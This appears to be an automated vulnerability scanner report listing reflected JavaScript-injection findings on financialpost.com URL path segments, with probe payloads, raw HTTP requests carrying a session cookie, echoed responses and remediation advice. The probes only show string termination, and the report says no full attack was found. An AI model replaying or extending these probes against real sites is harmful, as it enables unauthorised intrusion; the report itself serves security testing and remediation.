HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43289
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7a32'%3ba2f5d539c94 was submitted in the REST URL parameter 1. This input was echoed as a7a32';a2f5d539c94 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa7a32'%3ba2f5d539c94/financials/steps+plate/3996039/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 85990 Expires: Sun, 19 Dec 2010 03:10:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsa7a32';a2f5d539c94/financials/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsa7a32';a2f5d539c94;kw=financials;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=16955960?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c3c6'%3bfd6bcf5f23 was submitted in the REST URL parameter 2. This input was echoed as 4c3c6';fd6bcf5f23 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials4c3c6'%3bfd6bcf5f23/steps+plate/3996039/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 93245 Expires: Sun, 19 Dec 2010 03:10:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials4c3c6';fd6bcf5f23/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials4c3c6';fd6bcf5f23;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=10193409?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6154'%3b04265ffa851 was submitted in the REST URL parameter 4. This input was echoed as e6154';04265ffa851 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials/steps+plate/3996039e6154'%3b04265ffa851/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 76201 Expires: Sun, 19 Dec 2010 03:10:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials/steps-plate/3996039e6154';04265ffa851/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials;kw=steps-plate;kw=3996039e6154';04265ffa851;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=59123382? ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf56e'%3bd1d11237fe0 was submitted in the REST URL parameter 5. This input was echoed as cf56e';d1d11237fe0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials/steps+plate/3996039/cf56e'%3bd1d11237fe0 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37971
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9749c'%3bea6b87ad49c was submitted in the REST URL parameter 1. This input was echoed as 9749c';ea6b87ad49c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news9749c'%3bea6b87ad49c/legal/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37381
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de7ae'%3bad722b91cc3 was submitted in the REST URL parameter 2. This input was echoed as de7ae';ad722b91cc3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/legalde7ae'%3bad722b91cc3/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43189
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b9fe'%3beb1408074c9 was submitted in the REST URL parameter 1. This input was echoed as 3b9fe';eb1408074c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news3b9fe'%3beb1408074c9/marketing/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43306
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28044'%3bc70d3668348 was submitted in the REST URL parameter 2. This input was echoed as 28044';c70d3668348 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/marketing28044'%3bc70d3668348/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43269
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d492c'%3b18622a2ecd was submitted in the REST URL parameter 1. This input was echoed as d492c';18622a2ecd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsd492c'%3b18622a2ecd/mining/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36406
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 287dd'%3beeb5abe1ff2 was submitted in the REST URL parameter 2. This input was echoed as 287dd';eeb5abe1ff2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/mining287dd'%3beeb5abe1ff2/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43209
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d5c4'%3b688bdb9d235 was submitted in the REST URL parameter 1. This input was echoed as 4d5c4';688bdb9d235 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news4d5c4'%3b688bdb9d235/technology/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43326
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 278b5'%3b89821bbfc44 was submitted in the REST URL parameter 2. This input was echoed as 278b5';89821bbfc44 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/technology278b5'%3b89821bbfc44/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:10:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:10:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43289
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63693'%3b5121090781a was submitted in the REST URL parameter 1. This input was echoed as 63693';5121090781a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion63693'%3b5121090781a/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43940
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd052'%3b65c989df336 was submitted in the REST URL parameter 1. This input was echoed as bd052';65c989df336 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionbd052'%3b65c989df336/breaking-views/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37628
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a05'%3b5e640f9eda1 was submitted in the REST URL parameter 2. This input was echoed as 85a05';5e640f9eda1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/breaking-views85a05'%3b5e640f9eda1/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44256
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1998'%3bdad09d492bc was submitted in the REST URL parameter 1. This input was echoed as b1998';dad09d492bc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionb1998'%3bdad09d492bc/columnists/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37548
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7773e'%3bee2319eb393 was submitted in the REST URL parameter 2. This input was echoed as 7773e';ee2319eb393 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists7773e'%3bee2319eb393/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44176
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f06c4'%3ba01e7d2f0a9 was submitted in the REST URL parameter 1. This input was echoed as f06c4';a01e7d2f0a9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
